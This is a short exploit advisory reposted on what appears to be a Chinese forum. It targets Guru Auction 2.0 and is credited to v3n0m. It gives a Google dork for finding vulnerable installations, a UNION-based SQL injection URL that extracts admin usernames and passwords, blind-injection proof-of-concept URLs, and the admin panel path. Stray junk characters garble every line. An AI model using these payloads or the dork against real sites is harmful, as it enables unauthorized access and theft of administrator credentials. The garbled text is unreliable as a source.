Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
" k' J6 i! I% d/ r0 R& z" \- d6 O0 P/ t' f6 ?
作者 : v3n0m
+ z9 k- x; q, U- \应用 : Guru Auction 2.00 h; g) n! G5 @& F, Y% g
Price : $490 z1 w+ j% ~8 G% o6 a
Vendor : http://www.guruscript.com/+ D2 D. ], H/ r7 k" C
Google Dork : inurl:subcat.php?cate_id=& W5 M' g) n0 A- b2 c
. a9 C( b: O7 g( l/ Y1 G
SQLi p0c:7 j( n4 Q" b) ?* p3 D
~~~~~~~~~~
: d1 M1 y' V% W$ ^ |. w0 T; Vhttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
* Q6 P) |$ ^" E* a) i; L
$ M1 \+ ~3 O3 [$ _9 F, W8 d " ` j9 |9 G/ L; E
盲注 p0c:
6 z ^4 E6 q3 Q! O. t~~~~~~~~~~
4 k& O- }% |$ J) I! M' v7 ^http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
8 t2 D/ K9 R' V! W* jhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false- b6 _) ^& P4 _
. H1 k* A1 i- K- [! ^. V) P
管理登录入口:# N: J5 _# x2 F! W4 w1 E( m
~~~~~~~~~~
, ^2 M. m3 a) p: [' Z6 nhttp://domain.tld/[path]/admin/
3 P2 J: ~: T- X' d) ?7 A |
发表于 2012-12-31 09:24:05
收藏
支持
反对